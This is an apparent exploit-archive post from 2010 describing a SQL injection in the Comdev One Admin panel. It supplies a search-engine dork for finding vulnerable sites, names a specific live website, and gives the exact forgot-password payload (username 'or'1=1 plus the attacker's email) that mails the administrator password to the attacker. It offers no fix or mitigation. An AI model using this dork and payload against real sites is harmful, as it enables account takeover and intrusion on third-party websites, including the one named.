id: 13669
date: 08/11/2010
title: Comdev One Admin SQL Injection Vulnerability
author: Farzin0123
cves: 

============================================
Comdev One Admin SQL Injection Vulnerability
============================================


Author: farzin0123(pianist)

Version: possible all versions

Description :

Dork : "Powered by Comdev One Admin or" or "Please Proceed With Your Administration Login
"

 open page then click (forget password) ,like this page :http://www.carmelleazhomes.com/cb/

in forget password page >>Username:'or'1=1 , Email Address: YOUR EMAIL<< 

Password will be sent to your e-mail


Farzin0123.



#  0day.today [2023-03-26]  #